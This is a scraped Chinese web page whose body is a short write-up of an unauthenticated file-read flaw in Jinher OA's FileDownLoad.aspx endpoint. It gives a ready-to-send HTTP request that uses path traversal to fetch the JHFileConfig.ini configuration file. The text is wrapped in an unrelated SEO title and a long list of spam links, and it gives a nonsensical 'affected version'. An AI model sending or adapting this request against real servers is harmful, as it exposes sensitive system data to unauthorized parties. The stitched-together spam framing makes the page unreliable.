当前位置: 首页 > news >正文

企业云网站建设织梦软件怎么使用域名做网站

企业云网站建设,织梦软件怎么使用域名做网站,好看的网站分享,上海政务网站建设文章目录 免责声明漏洞描述漏洞原理影响版本漏洞复现修复建议 免责声明 没有网络安全就没有国家安全,该文章只为学习和交流,利用做违法乱纪的事,与本人无关 漏洞描述 金和网络是专业信息化服务商,为城市监管部门提供了互联网监管解决方案,…

文章目录

  • 免责声明
  • 漏洞描述
  • 漏洞原理
  • 影响版本
  • 漏洞复现
  • 修复建议

免责声明

没有网络安全就没有国家安全,该文章只为学习和交流,利用做违法乱纪的事,与本人无关

漏洞描述

金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同

漏洞原理

在FileDownLoad.aspx接口存在文件读取的漏洞,未经授权攻击者可以用过调用该接口获取系统的敏感信息

影响版本

>最新版本

漏洞复现

构造请求包

GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close

发送请求包
在这里插入图片描述

修复建议

更新到最新版本

http://www.yayakq.cn/news/187815/

相关文章:

  • 山东网站设计网站企业建站
  • 如何在建设部网站补录项目环保网站查询碾米是否做备案
  • 西部数码怎么上传网站敦煌网跨境电商平台
  • 能浏览的海外网站一做特卖的网站
  • 云主机配置网站万网创始人与慧聪网
  • 网站建设费可分摊几年微信如何引流推广精准加人
  • 网站建设柚子网络科技在哪里做网站余姚
  • 网站建设目标规划襄樊北京网站建设
  • 杂志社网站建设意义开发小程序定制软件
  • 做网站都可以用什么框架马鞍山建设局网站
  • 网站提取规则怎么设置基于asp的网络课程网站开发
  • 自建网站投放广告海洋网站建设性价比高
  • 百度提交网站已删内容重庆网站建设公司销售
  • 荆门哪里有专门做企业网站的新准则中公司网站建设费用计入什么科目
  • 微信网站改版价格具有价值的网站制作
  • 优秀设计工作室网站怒江州城乡建设局网站
  • 水果电商网站开发方案网站开发接口文档模板
  • 个人做商贸网站外贸平台大全
  • 湖南省建设银行网站wordpress编辑器转义
  • 阿里云网站域名备案wordpress kvstore
  • 常州网站制作机构网站建设服务商城
  • 淘宝客网站需要多大空间做网站公司价格多少
  • 万金娱乐网站开发网站文字规范
  • 建设网站的公司兴田德润在哪里现在做电商还能赚钱吗
  • 网站路径河南企业网官方网站
  • 普通网站怎么做h5网络规划工程师
  • 中和华丰建设有限责任公司网站郑州市二七建设局网站
  • 三合一网站建设平台编辑网站的软件手机
  • 监控网站开发建筑网站搜图
  • 外贸公司网站建设 重点是什么意思熊猫代理ip